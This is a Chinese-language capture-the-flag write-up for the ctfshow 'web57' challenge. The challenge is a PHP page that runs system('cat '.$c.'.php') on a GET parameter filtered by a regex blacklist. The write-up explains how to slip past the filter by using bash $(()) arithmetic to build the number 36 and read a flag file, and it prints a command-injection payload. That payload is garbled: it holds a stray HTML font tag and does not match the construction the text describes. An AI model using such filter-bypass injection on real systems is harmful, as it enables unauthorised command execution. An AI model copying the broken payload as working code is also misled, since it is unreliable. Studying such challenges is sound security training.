ctfshow web57

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/// 还能炫的动吗？
//flag in 36.php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){system("cat ".$c.".php");}
}else{highlight_file(__FILE__);
}

过滤了; a-z 0-9``反引号 % \x09 \x26 > <``\x0a``(``{``'``" ````# .,?*-=``[`

可以说过滤的非常完全了，之前的临时文件上传也无法使用了(.和/都给你过滤了)，这里没有办法，但是看到flag in 36.php或许是突破口，但是数字不是过滤了吗

利用linux的$(())构造出36

$(())=0

$((~ $(()) ))=-1

(())是用来整数运算的命令，内部可以放表达式，默认相加，通过$((~36)) 可得36取反为-37

综合上述，可以构造payload

:::info
?c=$((_{$((</font>$((}$(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(())))$((_$(())))$(($(()))) ))))

:::

payload中标红的地方就是取反，红色里面包含37个$((~$(())))都是-1，默认相加，得到-37后再取反即可得到36